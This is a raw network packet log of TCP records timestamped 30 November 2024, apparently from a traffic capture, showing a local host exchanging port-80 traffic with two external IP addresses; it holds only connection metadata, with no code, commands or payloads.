Nov 30, 2024 04:06:53.357230902 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.357284069 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.357346058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.357399940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.358330011 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.358381987 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.358448029 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.358499050 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.359421015 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.359563112 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.359733105 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.360516071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.360569000 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.360632896 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.360686064 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.361599922 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.361648083 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.361654043 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.361696959 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.362689972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.362741947 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.397783041 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.397881985 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.397933006 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.400263071 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.423459053 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.423537970 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.423564911 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.425774097 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.425822020 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.425878048 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.430397987 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.430447102 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.430515051 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.435058117 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.435106039 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.435159922 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.439724922 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.439774990 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.439800024 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.444329023 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.444390059 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.444428921 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.448999882 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.449050903 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.449086905 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.453639030 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.453685999 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.453727007 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.458288908 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.458338976 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.458383083 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.462955952 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.462997913 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.463064909 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.467576981 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.467621088 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.467675924 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.472232103 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.472275019 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.472349882 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.476862907 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.476912022 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.476927042 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.481537104 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.481586933 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.481647968 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.486176968 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.486227036 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.486263037 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.490839005 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.490886927 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.490951061 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.495481968 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.495524883 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.495579004 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.497298002 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.497354031 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.497359037 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.497427940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.497631073 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.497670889 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.497740030 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.497908115 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.498708963 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.498760939 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.498816013 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.498868942 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.499788046 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.499840021 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.499917984 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.499972105 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.500113010 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.500154972 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.500191927 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.500869036 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.500924110 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.500977993 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.501025915 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.501954079 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.502024889 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.502055883 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.502104044 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.503041983 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.503123045 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.503148079 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.503194094 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.504143953 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.504208088 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.504271030 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.504318953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.504750013 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.504796982 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.504838943 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.505244017 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.505291939 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.505368948 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.505419016 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.506314993 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.506427050 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.506505013 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.507411957 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.507462025 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.507498980 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.507548094 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.508470058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.508522034 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.508580923 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.508631945 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.509382010 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.509421110 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.509502888 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.509592056 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.509603024 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.509810925 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.510670900 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.510724068 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.510770082 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.510819912 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.511749983 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.511802912 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.511868954 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.511921883 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.512845039 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.512901068 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.512954950 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.513005972 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.513927937 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.513982058 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.514015913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.514040947 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.514060974 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.514084101 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.515019894 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.515081882 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.515114069 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.515158892 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.516108036 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.516163111 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.516236067 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.516293049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.517193079 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.517244101 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.517292976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.517342091 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.518275023 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.518328905 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.518361092 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.518414974 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.519349098 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.519398928 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.519562006 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.519618034 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.520461082 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.520510912 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.520569086 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.520642996 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.521534920 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.521590948 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.521636009 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.521687984 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.522630930 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.522680044 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.522716045 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.522768974 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.523711920 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.523762941 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.523828983 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.523870945 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.524804115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.524858952 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.524897099 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.524949074 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.525871038 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.525922060 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.525980949 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.526034117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.526961088 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.527010918 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.527065039 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.527276993 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.528043985 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.528099060 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.528146982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.528197050 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.529149055 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.529202938 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.529248953 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.529299021 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.530214071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.530268908 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.530323982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.530375004 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.531352997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.531400919 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.531424046 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.531471014 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.532417059 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.532479048 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.532510996 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.532588005 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.533469915 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.533518076 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.533591032 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.533639908 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.534568071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.534626007 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.534660101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.534713984 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.535661936 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.535713911 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.535782099 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.535828114 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.536734104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.536788940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.536858082 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.536906958 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.537832975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.537884951 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.537934065 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.537986994 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.538918018 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.539089918 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.539125919 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.539252043 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.540029049 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.540086031 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.540148020 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.540199041 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.541111946 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.541167974 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.541201115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.541373968 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.542186975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.542238951 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.542299986 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.542351007 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.543288946 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.543332100 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.543358088 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.543411016 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.544363976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.544433117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.544476986 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.544517040 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.545454979 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.545502901 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.545547009 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.545593023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.546528101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.546577930 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.546608925 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.546654940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.547627926 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.547688007 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.547733068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.547780037 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.548702955 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.548753023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.548815966 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.548865080 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.549782991 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.549832106 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.549885988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.549936056 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.550887108 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.550951958 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.550985098 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.551105976 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.552017927 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.552069902 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.552114964 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.552165985 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.553052902 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.553105116 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.553163052 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.553215981 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.554127932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.554187059 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.598716974 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.598822117 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.598874092 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.600960970 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.601057053 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.601217985 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.605370045 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.624433994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.624479055 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.624500990 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.626270056 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.626316071 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.626394033 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.629914045 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.629965067 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.630031109 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.633544922 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.633575916 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.633656979 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.637094975 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.637131929 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.637137890 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.640537024 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.640583038 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.640652895 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.644042969 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.644093037 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.644130945 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.647342920 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.647391081 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.647454977 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.650759935 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.650814056 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.650852919 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.654086113 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.654172897 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.654197931 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.657476902 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.657522917 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.657587051 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.660835028 CET	80	49894	185.215.113.16	192.168.2.4
